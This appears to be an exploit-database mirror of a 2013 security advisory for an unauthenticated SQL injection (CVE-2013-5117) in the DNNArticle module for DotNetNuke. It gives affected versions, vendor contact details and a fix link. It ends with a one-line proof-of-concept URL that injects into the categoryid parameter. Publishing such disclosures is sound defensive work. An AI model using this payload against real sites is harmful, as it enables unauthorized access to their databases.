- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 27602
- Проверка EDB
-
- Пройдено
- Автор
- SAJJAD POURALI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2013-5117
- Дата публикации
- 2013-08-15
Код:
Title: DotNetNuke (DNNArticle Module) SQL Injection Vulnerability
References: CVE-2013-5117
Discovered by: Sajjad Pourali
Vendor http://www.zldnn.com/ , http://www.dnnarticle.com/
Vendor advisory: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)
Vendor contact: 2013-8-14
Solution: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)
Remote: yes
Authentication required: no
User interaction required: no
Impact: High
Affected:
- DNNArticle 10.0 and earlier
---
PoC:
http://server/desktopmodules/dnnarticle/dnnarticlerss.aspx?moduleid=0&categoryid=1+or+1=@@version
---
+ Sajjad Pourali
+ http://www.securation.com/
+ http://www.cert.um.ac.ir/
+ Contact: sajjad[at]securation.com
- Источник
- www.exploit-db.com